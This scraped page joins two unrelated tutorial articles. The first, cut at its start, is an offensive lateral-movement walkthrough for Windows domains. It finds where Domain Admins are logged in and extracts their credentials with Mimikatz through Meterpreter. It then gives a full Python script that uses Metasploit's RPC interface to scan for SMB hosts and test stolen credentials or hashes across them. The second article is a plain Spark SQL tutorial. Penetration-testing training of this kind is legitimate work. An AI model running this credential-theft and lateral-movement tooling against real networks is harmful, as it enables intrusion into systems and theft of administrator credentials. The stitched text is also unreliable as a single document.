    net group "Domain Admins"

We can then grep through the spooled output file from the previously run module to locate relevant systems that these DAs might be logged into. When gaining access to one of those systems, there would likely be DA tokens or credentials in memory, which can be extracted and reused. The following command is an example of how to analyze the log file for these types of entries.

    grep <username> <spoolfile.log>

As you can see, this very simple exploit path allows you to identify where the DAs are. Once you are on the system, all you have to do is load mimikatz and extract the credentials, typically with the wdigest command from the established Meterpreter session. Of course, this means the system has to be newer than Windows 2000, and have active credentials in memory. If not, it will take additional effort and research to move forward. To highlight this, we use our established session to extract credentials with Mimikatz, as you can see following. The credentials are in memory, and since the target box was a Windows XP machine, we have no conflicts and no additional research is required.
In addition to the intelligence we have gathered from extracting the active DA list from the system, we now have another set of confirmed credentials that can be used. Rinsing and repeating this method of attack allows you to quickly move laterally around the network until you identify viable targets.

Automating the exploit train with Python
This exploit train is relatively simple, but we can automate a portion of it with the Metasploit Remote Procedure Call (MSFRPC). This script will use the nmap library to scan for hosts with port 445 open, then generate a list of targets to test using a username and password passed via argument to the script. The script will use the same smb_enumusers_domain module to identify boxes that have the credentials reused and other viable users logged into them. First, we need to install the SpiderLabs msfrpc library for Python. This library can be found at https://github.com/SpiderLabs/msfrpc.git. The script we are creating uses the netifaces library to identify which interface IP addresses belong to your host. It then scans for port 445, the SMB port, on the IP address, range, or Classless Inter-Domain Routing (CIDR) address. It eliminates any IP addresses that belong to your interfaces and then tests the credentials using the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain. At the same time, it verifies what users are logged onto the system. The outputs of this script, in addition to the real-time response, are two files: a log file that contains all the responses, and a file that holds the IP addresses for all the hosts that have SMB services. This Metasploit module takes advantage of DCE/RPC, which does not run on port 445, but we are verifying that the service is available for follow-on exploitation.
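The step that removes your own interface addresses from the target pool can be sketched on its own. This is a simplified illustration, not the script's code: the function name is hypothetical, and the shape of the ifaces dictionary (interface name mapped to a dictionary with an "addr" key) is an assumption based on how the script later compares v['addr'] against each host.

```python
def remove_local_addresses(candidates, ifaces):
    """Drop every candidate address that belongs to one of our own interfaces."""
    local_addresses = {details["addr"] for details in ifaces.values()}
    return [host for host in candidates if host not in local_addresses]


# Hypothetical interface data and scan results, for illustration only.
ifaces = {
    "eth0": {"addr": "192.168.195.160"},
    "lo": {"addr": "127.0.0.1"},
}
candidates = ["192.168.195.10", "192.168.195.160", "192.168.195.20"]
targets = remove_local_addresses(candidates, ifaces)
print(targets)
```

Building the set of local addresses once keeps the filter independent of the number of interfaces, and returning a new list avoids modifying the scan results while iterating over them.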
This file could then be fed back into the script if you, as an attacker, find other credential sets to test, as shown following: Lastly, the script can be passed hashes directly, just like the Metasploit module, as shown following: The output will be slightly different for each run of the script, depending on the console identifier you grab to execute the command. The only real difference will be the additional banner items typical of a Metasploit console initiation. Now, there are a couple of things that have to be stated. Yes, you could just generate a resource file, but when you start getting into organizations that have millions of IP addresses, this becomes unmanageable. The MSFRPC can also have resource files fed directly into it, but this can significantly slow the process. If you want to compare, rewrite this script to do the same test as the previous ssh_login.py script you wrote, but with direct MSFRPC integration. As with all scripts, the required libraries need to be imported first. You are already familiar with most of these; the newest one is the msfrpc library by SpiderLabs. The required libraries for this script can be seen as follows:

    import os, argparse, sys, time
    try:
        import msfrpc
    except ImportError:
        sys.exit("[!] Install the msfrpc library that can be found here: https://github.com/SpiderLabs/msfrpc.git")
    try:
        import nmap
    except ImportError:
        sys.exit("[!] Install the nmap library: pip install python-nmap")
    try:
        import netifaces
    except ImportError:
        sys.exit("[!] Install the netifaces library: pip install netifaces")

We then build a function to identify the relevant targets that the auxiliary module is going to be run against. First, we set up the initial variables and the passed parameters. Notice that we have two service names to test against for this script, microsoft-ds and netbios-ssn, as either one could represent port 445 based on the nmap results.
    def target_identifier(verbose, dir, user, passwd, ips, port_num, ifaces, ipfile):
        hostlist = []
        pre_pend = "smb"
        service_name = "microsoft-ds"
        service_name2 = "netbios-ssn"
        protocol = "tcp"
        port_state = "open"
        bufsize = 0
        hosts_output = "%s/%s_hosts" % (dir, pre_pend)

After which, we configure the nmap scanner to scan for details either by file or by command line. Notice that the hostlist is a string of all the addresses loaded from the file, separated by spaces. The ipfile is opened and read, and then all newlines are replaced with spaces as they are loaded into the string. This is a requirement for the hosts argument of the nmap library.

        # Create the python-nmap scanner object used by the calls below
        scanner = nmap.PortScanner()
        if ipfile != None:
            if verbose > 0:
                print("[*] Scanning for hosts from file %s" % (ipfile))
            with open(ipfile) as f:
                hostlist = f.read().replace('\n', ' ')
            scanner.scan(hosts=hostlist, ports=port_num)
        else:
            if verbose > 0:
                print("[*] Scanning for host(s) %s" % (ips))
            scanner.scan(ips, port_num)
        # Truncate the output file before appending new results
        open(hosts_output, 'w').close()
        hostlist = []
        if scanner.all_hosts():
            e = open(hosts_output, 'a', bufsize)
        else:
            sys.exit("[!] No viable targets were found!")

The IP addresses for all of the interfaces on the attack system are removed from the test pool.

        for host in scanner.all_hosts():
            for k, v in ifaces.iteritems():
                if v['addr'] == host:
                    print("[-] Removing %s from target list since it belongs to your interface!" % (host))
                    host = None

Finally, the details are written to the relevant output file and Python lists, and then returned to the caller.
            if host != None:
                e = open(hosts_output, 'a', bufsize)
                # Test each service name explicitly; "a or b in x" would always be true
                name = scanner[host][protocol][int(port_num)]['name']
                if service_name in name or service_name2 in name:
                    if port_state in scanner[host][protocol][int(port_num)]['state']:
                        if verbose > 0:
                            print("[+] Adding host %s to %s since the service is active on %s" % (host, hosts_output, port_num))
                        hostdata = host + "\n"
                        e.write(hostdata)
                        hostlist.append(host)
                else:
                    if verbose > 0:
                        print("[-] Host %s is not being added to %s since the service is not active on %s" % (host, hosts_output, port_num))
        # Close the output file before returning
        e.close()
        if hosts_output:
            return hosts_output, hostlist

The next function creates the actual command that will be executed; this function will be called for each host that the scan returned as a potential target.

    def build_command(verbose, user, passwd, dom, port, ip):
        module = "auxiliary/scanner/smb/smb_enumusers_domain"
        # Each console command must be on its own line
        command = '''use ''' + module + '''
    set RHOSTS ''' + ip + '''
    set SMBUser ''' + user + '''
    set SMBPass ''' + passwd + '''
    set SMBDomain ''' + dom + '''
    run
    '''
        return command, module

The last function actually initiates the connection with the MSFRPC and executes the relevant command per specific host.

    def run_commands(verbose, iplist, user, passwd, dom, port, file):
        bufsize = 0
        e = open(file, 'a', bufsize)
        done = False

The script creates a connection with the MSFRPC, creates a console, and then tracks it by a specific console_id. Do not forget that the msfconsole can have multiple sessions, and as such we have to track our session by its console_id.

        client = msfrpc.Msfrpc({})
        client.login('msf','msfrpcpassword')
        try:
            result = client.call('console.create')
        except:
            sys.exit("[!] Creation of console failed!")
        console_id = result['id']
        console_id_int = int(console_id)

The script then iterates over the list of IP addresses that were confirmed to have an active SMB service, and creates the necessary commands for each of those IP addresses.
        for ip in iplist:
            # Reset the flag so that output is read for every host, not only the first
            done = False
            if verbose > 0:
                print("[*] Building custom command for: %s" % (str(ip)))
            command, module = build_command(verbose, user, passwd, dom, port, ip)
            if verbose > 0:
                print("[*] Executing Metasploit module %s on host: %s" % (module, str(ip)))

The command is then written to the console and we wait for the results.

            client.call('console.write',[console_id, command])
            time.sleep(1)
            while done != True:

We await the results for each command execution and verify the data that has been returned and that the console is not still running. If it is, we delay the reading of the data. Once it has completed, the results are written to the specified output file.

                result = client.call('console.read',[console_id_int])
                if len(result['data']) > 1:
                    if result['busy'] == True:
                        time.sleep(1)
                        continue
                    else:
                        console_output = result['data']
                        e.write(console_output)
                        if verbose > 0:
                            print(console_output)
                        done = True

We close the file and destroy the console to clean up the work we had done.

        e.close()
        client.call('console.destroy',[console_id])

The final pieces of the script are related to setting up the arguments, setting up the constructors, and calling the modules. These components are similar to previous scripts and have not been included here for the sake of space, but the details can be found at the previously mentioned location on GitHub. The last requirement is loading msgrpc at the msfconsole with the specific password that we want. So launch the msfconsole and then execute the following within it.

    load msgrpc Pass=msfrpcpassword

The command was not mistyped; Metasploit has moved to msgrpc versus msfrpc, but everyone still refers to it as msfrpc. The big difference is that the msgrpc library uses POST requests to send data, while msfrpc used eXtensible Markup Language (XML). All of this can be automated with resource files to set up the service.

Summary
In this article, we highlighted a manner in which you can move through a sample environment.
Specifically, we showed how to exploit a relevant box, escalate privileges, and extract additional credentials. From that position, we identified other viable hosts we could laterally move into and the users who were currently logged into them. We generated custom payloads with the Veil Framework to bypass HIPS, and executed a PtH attack. This allowed us to extract other credentials from memory with the tool Mimikatz. We then automated the identification of viable secondary targets and the users logged into them with Python and MSFRPC. Resources for Article: Further resources on this subject: Basics of Jupyter Notebook and Python [article] Scraping the Data [article] Modeling complex functions with artificial neural networks [article]


Packt

24 Sep 2015

11 min read

Integration with Spark SQL


In this article by Sumit Gupta, the author of the book Learning Real-time Processing with Spark Streaming, we will discuss the integration of Spark Streaming with other advanced Spark libraries such as Spark SQL. (For more resources related to this topic, see here.) No single piece of software in today's world can fulfill the varied, versatile, and complex demands of enterprises, and to be honest, neither should it! Software is built to fulfill specific needs that arise in an enterprise at a particular point in time, and those needs may change in the future due to many other factors. These factors, such as government policies and business/market dynamics, may or may not be controllable. Considering all these factors, the integration and interoperability of any software system with internal and external systems is pivotal in fulfilling enterprise needs. Integration and interoperability are categorized as nonfunctional requirements, which are always implicit and may or may not be explicitly stated by the end users. Over time, architects have realized the importance of these implicit requirements in modern enterprises, and now all enterprise architectures give due diligence to, and make provisions for, fulfilling them. Even enterprise architecture frameworks such as The Open Group Architecture Framework (TOGAF) define a specific set of procedures and guidelines for defining and establishing the interoperability and integration requirements of modern enterprises. The Spark community realized the importance of both these factors and provided a versatile and scalable framework with certain hooks for integration and interoperability with different systems and libraries. For example, data consumed and processed via Spark streams can also be loaded into a structured (table: rows/columns) format and can be further queried using SQL.
The data can even be stored in HDFS as persistent Hive tables, which continue to exist after our Spark program has restarted. In this article, we will discuss querying streaming data in real time using Spark SQL.

Querying streaming data in real time

Spark Streaming is developed on the principle of integration and interoperability: it not only provides a framework for consuming data in near real time from varied data sources, but also integrates with Spark SQL, so that existing DStreams can be converted into a structured data format and queried using standard SQL constructs.

There are many use cases where SQL on streaming data is a much-needed feature. For example, in our distributed log analysis use case, we may need to combine precomputed datasets with the streaming data to perform exploratory analysis using interactive SQL queries. This is difficult to implement with streaming operators alone, as they are not designed for introducing new datasets and performing ad hoc queries.

Moreover, SQL's success at expressing complex data transformations derives from the fact that it is based on a set of very powerful data processing primitives for filtering, merging, correlation, and aggregation. These primitives are not available out of the box in lower-level programming languages such as Java or C++, where implementing them by hand may result in long development cycles and high maintenance costs.

Let's move forward and first understand a few things about Spark SQL; then we will see the process of converting existing DStreams into structured formats.

Understanding Spark SQL

Spark SQL is one of the modules developed over the Spark framework for processing structured data, which is stored in the form of rows and columns. At a very high level, it is similar to an RDBMS, where data resides in rows and columns and SQL queries are executed to perform analysis, but Spark SQL is much more versatile and flexible than an RDBMS.
Spark SQL provides distributed processing of SQL queries and can be compared to frameworks such as Hive, Impala, or Drill. Here are a few notable features of Spark SQL:

- Spark SQL is capable of loading data from a variety of data sources such as text files, JSON, Hive, HDFS, Parquet format, and of course RDBMS too, so that we can consume, join, and process datasets from different and varied data sources.
- It supports static and dynamic schema definition for the data loaded from various sources, which helps in defining the schema for known data structures/types, and also for those datasets where the columns and their types are not known until runtime.
- It can work as a distributed query engine using the Thrift JDBC/ODBC server or the command-line interface, where end users or applications can interact with Spark SQL directly to run SQL queries.
- Spark SQL provides integration with Spark Streaming, where DStreams can be transformed into a structured format on which SQL queries can then be executed.
- It is capable of caching tables using an in-memory columnar format for faster reads and in-memory data processing.
- It supports schema evolution, so that columns can be added to or deleted from the existing schema while Spark SQL still maintains compatibility between all versions of the schema.

Spark SQL defines a higher level of programming abstraction called DataFrames, which is also an extension to the existing RDD API. A DataFrame is a distributed collection of objects in the form of rows and named columns, which is similar to a table in an RDBMS but with much richer functionality, containing all the previously defined features. The DataFrame API is inspired by the concepts of data frames in R (http://www.r-tutor.com/r-introduction/data-frame) and Python (http://pandas.pydata.org/pandas-docs/stable/dsintro.html#dataframe).
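The Spark Streaming integration mentioned in the feature list can be sketched roughly as follows, assuming Spark 1.3.x with the spark-streaming module on the classpath. Each batch of a DStream is converted into a DataFrame, registered as a temporary table, and queried with SQL. The LogLine case class, the "LEVEL message" log layout, the socket source on localhost:9999, and the local[2] master are all assumptions made for illustration; SQLContext itself is introduced in the example that follows.

```scala
import org.apache.spark.SparkConf
import org.apache.spark.sql.SQLContext
import org.apache.spark.streaming.{Seconds, StreamingContext}

// Hypothetical record type for one log line. It is defined at the top level
// (not inside a method) so that Spark SQL can infer its schema by reflection.
case class LogLine(level: String, message: String)

object StreamingSqlSketch {

  // Splits "LEVEL rest of the message" into a LogLine (assumed log layout).
  def parse(line: String): LogLine = {
    val parts = line.split(" ", 2)
    LogLine(parts(0), if (parts.length > 1) parts(1) else "")
  }

  def main(args: Array[String]): Unit = {
    // local[2] is an assumption for a local run: one thread for the receiver,
    // one for processing.
    val conf = new SparkConf().setAppName("Streaming SQL sketch").setMaster("local[2]")
    val ssc = new StreamingContext(conf, Seconds(10))
    val sqlCtx = new SQLContext(ssc.sparkContext)
    import sqlCtx.implicits._ // brings toDF() into scope for RDDs of case classes

    // Assumed source: plain-text log lines arriving on a local socket.
    val lines = ssc.socketTextStream("localhost", 9999)

    lines.foreachRDD { rdd =>
      // Convert the current batch into a DataFrame and expose it to SQL.
      val logs = rdd.map(parse).toDF()
      logs.registerTempTable("logs")
      sqlCtx.sql("SELECT level, COUNT(*) AS total FROM logs GROUP BY level")
        .collect()
        .foreach(println)
    }

    ssc.start()
    ssc.awaitTermination()
  }
}
```

Because the temporary table is re-registered for every batch, each query only sees the data of the current batch interval.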
Let's move ahead and understand how Spark SQL works with the help of an example.

As a first step, let's create sample JSON data containing basic information about a company's departments, such as Name, Employees, and so on, and save this data into the file company.json. The JSON file would look like this:

    [
      { "Name":"DEPT_A", "No_Of_Emp":10, "No_Of_Supervisors":2 },
      { "Name":"DEPT_B", "No_Of_Emp":12, "No_Of_Supervisors":2 },
      { "Name":"DEPT_C", "No_Of_Emp":14, "No_Of_Supervisors":3 },
      { "Name":"DEPT_D", "No_Of_Emp":10, "No_Of_Supervisors":1 },
      { "Name":"DEPT_E", "No_Of_Emp":20, "No_Of_Supervisors":5 }
    ]

You can use any online JSON editor such as http://codebeautify.org/online-json-editor to see and edit the data defined in the preceding JSON code.

Next, let's extend our Spark-Examples project and create a new package by the name chapter.six, and within this new package, create a new Scala object and name it ScalaFirstSparkSQL.scala.

Next, add the following import statements just below the package declaration:

    import org.apache.spark.SparkConf
    import org.apache.spark.SparkContext
    import org.apache.spark.sql._
    import org.apache.spark.sql.functions._

Further, in your main method, add the following set of statements to create SQLContext from SparkContext:

    //Creating Spark Configuration
    val conf = new SparkConf()
    //Setting Application/ Job Name
    conf.setAppName("My First Spark SQL")
    // Define Spark Context which we will use to initialize our SQL Context
    val sparkCtx = new SparkContext(conf)
    //Creating SQL Context
    val sqlCtx = new SQLContext(sparkCtx)

SQLContext, or any of its descendants such as HiveContext (for working with Hive tables) or CassandraSQLContext (for working with Cassandra tables), is the main entry point for accessing all functionalities of Spark SQL. It allows the creation of data frames, and also provides functionality to fire SQL queries over data frames.
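One caveat about the company.json file created in the first step: according to the Spark SQL programming guide, the jsonFile(…) method used in the next step expects every line of the input to hold one complete, self-contained JSON object, so a pretty-printed JSON array may not load as intended. The following sketch (plain Scala, no Spark required) writes the same sample data in that one-object-per-line layout. The CompanyJsonWriter object, the toJsonLine helper, and the default output path are hypothetical names introduced only for illustration.

```scala
import java.nio.charset.StandardCharsets
import java.nio.file.{Files, Paths}

// Hypothetical helper, not part of the original Spark-Examples project.
object CompanyJsonWriter {

  // (Name, No_Of_Emp, No_Of_Supervisors), copied from the sample data above.
  val departments = Seq(
    ("DEPT_A", 10, 2),
    ("DEPT_B", 12, 2),
    ("DEPT_C", 14, 3),
    ("DEPT_D", 10, 1),
    ("DEPT_E", 20, 5))

  // Renders one department as a single-line JSON object.
  def toJsonLine(name: String, employees: Int, supervisors: Int): String =
    s"""{"Name":"$name","No_Of_Emp":$employees,"No_Of_Supervisors":$supervisors}"""

  def main(args: Array[String]): Unit = {
    // The output path is an assumption; pass a different one as the first argument.
    val path = if (args.nonEmpty) args(0) else "company.json"
    val lines = departments.map { case (n, e, s) => toJsonLine(n, e, s) }
    // One JSON object per line, with no enclosing brackets or trailing commas.
    Files.write(Paths.get(path), lines.mkString("\n").getBytes(StandardCharsets.UTF_8))
  }
}
```

If the loaded table later shows unexpected or corrupt records, the file layout is a good first thing to check.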
Next, we will define the following code to load the JSON file (company.json) using the SQLContext, which also creates a data frame:

    //Define path of your JSON File (company.json) which needs to be processed
    val path = "/home/softwares/spark/data/company.json"
    //Use SQLContext and Load the JSON file.
    //This will return the DataFrame which can be further Queried using SQL queries.
    val dataFrame = sqlCtx.jsonFile(path)

In the preceding piece of code, we used the jsonFile(…) method for loading the JSON data. SQLContext defines other utility methods for reading raw data from the filesystem, creating data frames from existing RDDs, and more.

Spark SQL supports two different methods for converting existing RDDs into data frames:

- The first method uses reflection to infer the schema of an RDD from the given data. This approach leads to more concise code and helps in instances where we already know the schema while writing the Spark application. Our example takes a similar route: jsonFile(…) infers the schema from the JSON data itself.
- The second method is through a programmatic interface that allows us to construct a schema, apply it to an existing RDD, and finally generate a data frame. This method is more verbose, but provides flexibility and helps in those instances where columns and data types are not known until the data is received at runtime.

Refer to https://spark.apache.org/docs/1.3.0/api/scala/index.html#org.apache.spark.sql.SQLContext for a complete list of methods exposed by SQLContext.

Once the DataFrame is created, we need to register it as a temporary table within the SQL context so that we can execute SQL queries over the registered table. Let's add the following piece of code for registering our DataFrame with our SQL context under the name company:

    //Register the data as a temporary table within SQL Context
    //Temporary table is destroyed as soon as SQL Context is destroyed.
    dataFrame.registerTempTable("company")

And we are done… Our JSON data is automatically organized into a table (rows/columns) and is ready to accept SQL queries. Even the data types are inferred from the type of data entered within the JSON file itself.

Now, we will start executing SQL queries on our table, but before that, let's see the schema created by SQLContext:

    //Printing the Schema of the Data loaded in the Data Frame
    dataFrame.printSchema()

The execution of the preceding statement will provide results similar to the following illustration:

[Illustration: schema of the JSON data loaded by Spark SQL]

The preceding illustration shows the schema of the JSON data loaded by Spark SQL. Pretty simple and straightforward, isn't it? Spark SQL has automatically created our schema based on the data defined in our company.json file. It has also defined the data type of each of the columns.

We can also define the schema using reflection (https://spark.apache.org/docs/1.3.0/sql-programming-guide.html#inferring-the-schema-using-reflection) or define it programmatically (https://spark.apache.org/docs/1.3.0/sql-programming-guide.html#programmatically-specifying-the-schema).
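The two ways of defining a schema explicitly can be sketched side by side as follows, assuming Spark 1.3.x. The Department case class, the SchemaSketch object, the in-memory sample rows, and the local[2] master are assumptions made for illustration and are not part of the original example.

```scala
import org.apache.spark.{SparkConf, SparkContext}
import org.apache.spark.sql.{Row, SQLContext}
import org.apache.spark.sql.types.{LongType, StringType, StructField, StructType}

// Case class used for reflection-based inference. It is defined at the top
// level so that Spark SQL can derive column names and types from its fields.
case class Department(Name: String, No_Of_Emp: Long, No_Of_Supervisors: Long)

object SchemaSketch {

  // Explicit schema for the programmatic approach.
  val companySchema = StructType(Array(
    StructField("Name", StringType, nullable = false),
    StructField("No_Of_Emp", LongType, nullable = false),
    StructField("No_Of_Supervisors", LongType, nullable = false)))

  def main(args: Array[String]): Unit = {
    // local[2] is an assumption for running the sketch on a single machine.
    val conf = new SparkConf().setAppName("Schema sketch").setMaster("local[2]")
    val sparkCtx = new SparkContext(conf)
    val sqlCtx = new SQLContext(sparkCtx)
    import sqlCtx.implicits._ // enables toDF() on RDDs of case classes

    // A couple of sample rows held in memory instead of a file.
    val raw = sparkCtx.parallelize(Seq(("DEPT_A", 10L, 2L), ("DEPT_B", 12L, 2L)))

    // 1. Reflection: the schema is inferred from the Department case class.
    val byReflection = raw.map { case (n, e, s) => Department(n, e, s) }.toDF()
    byReflection.printSchema()

    // 2. Programmatic: generic Row objects plus the explicit StructType.
    val rows = raw.map { case (n, e, s) => Row(n, e, s) }
    val bySchema = sqlCtx.createDataFrame(rows, companySchema)
    bySchema.printSchema()

    sparkCtx.stop()
  }
}
```

The reflection variant is shorter, while the programmatic variant allows the StructType to be assembled at runtime, for example from a header line or a configuration file.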
Next, let's execute some SQL queries to see the data stored in the DataFrame. The first query prints all records:

    //Executing SQL Queries to Print all records in the DataFrame
    println("Printing All records")
    sqlCtx.sql("Select * from company").collect().foreach(println)

The execution of the preceding statement will produce the following results on the console where the driver is executed:

[Illustration: console output listing all records]

Next, let's select only a few columns instead of all of them and print the result on the console:

    //Executing SQL Queries to Print Name and Employees
    //in each Department
    println("\n Printing Number of Employees in All Departments")
    sqlCtx.sql("Select Name, No_Of_Emp from company").collect().foreach(println)

The execution of the preceding statement will produce the following results on the console where the driver is executed:

[Illustration: console output listing Name and No_Of_Emp for each department]

Now, finally, let's do some aggregation and count the total number of employees across all departments:

    //Using the aggregate function (agg) to print the
    //total number of employees in the Company
    println("\n Printing Total Number of Employees in Company_X")
    val allRec = sqlCtx.sql("Select * from company").agg(Map("No_Of_Emp"->"sum"))
    allRec.collect().foreach(println)

In the preceding piece of code, we used the agg(…) function to sum the employees across all departments; sum can be replaced by avg, max, min, or count. The execution of the preceding statement will produce the following results on the console where the driver is executed:

[Illustration: console output showing the result of the aggregation]

The preceding illustration shows the result of executing the aggregation on our company.json data. Refer to the Data Frame API at https://spark.apache.org/docs/1.3.0/api/scala/index.html#org.apache.spark.sql.DataFrame for further information on the available functions for performing aggregation.

As a last step, we will stop our Spark SQL context by invoking the stop() function on SparkContext: sparkCtx.stop().
This is required so that your application can notify the master or resource manager to release all resources allocated to the Spark job. It also ensures the graceful shutdown of the job and avoids resource leaks that may happen otherwise. Also, as of now, only one Spark context can be active per JVM, so we need to stop() the active SparkContext before creating a new one.

Summary

In this article, we have seen the step-by-step process of using Spark SQL as a standalone program. Though we have used JSON files as an example, we can also leverage Spark SQL with Cassandra (https://github.com/datastax/spark-cassandra-connector/blob/master/doc/2_loading.md), MongoDB (https://github.com/Stratio/spark-mongodb), or Elasticsearch (http://chapeau.freevariable.com/2015/04/elasticsearch-and-spark-1-dot-3.html).
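As a follow-up to the queries in this article, the same results can also be obtained through the DataFrame API instead of SQL strings. The following is a minimal sketch under stated assumptions: Spark 1.3.x, a company.json file with one JSON object per line, and a local[2] master. The DataFrameApiSketch object and the inputPath helper are hypothetical names; the try/finally block is just one way to make sure stop() is always called.

```scala
import org.apache.spark.{SparkConf, SparkContext}
import org.apache.spark.sql.SQLContext
import org.apache.spark.sql.functions.{avg, max, sum}

object DataFrameApiSketch {

  // Picks the input file: first argument if given, else an assumed default.
  def inputPath(args: Array[String]): String =
    if (args.nonEmpty) args(0) else "company.json"

  def main(args: Array[String]): Unit = {
    val conf = new SparkConf().setAppName("DataFrame API sketch").setMaster("local[2]")
    val sparkCtx = new SparkContext(conf)
    try {
      val sqlCtx = new SQLContext(sparkCtx)
      val dataFrame = sqlCtx.jsonFile(inputPath(args))

      // Equivalent of: Select Name, No_Of_Emp from company
      dataFrame.select("Name", "No_Of_Emp").collect().foreach(println)

      // Several aggregates in one pass over the No_Of_Emp column.
      val employees = dataFrame("No_Of_Emp")
      dataFrame.agg(sum(employees), avg(employees), max(employees))
        .collect()
        .foreach(println)

      // Filtering with a column expression instead of a WHERE clause.
      dataFrame.filter(employees > 10).select("Name").collect().foreach(println)
    } finally {
      // Release the resources of the job even if a query above fails.
      sparkCtx.stop()
    }
  }
}
```

For the sample data used in this article, the sum of No_Of_Emp is 10 + 12 + 14 + 10 + 20 = 66, which is a quick way to sanity-check the aggregation.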
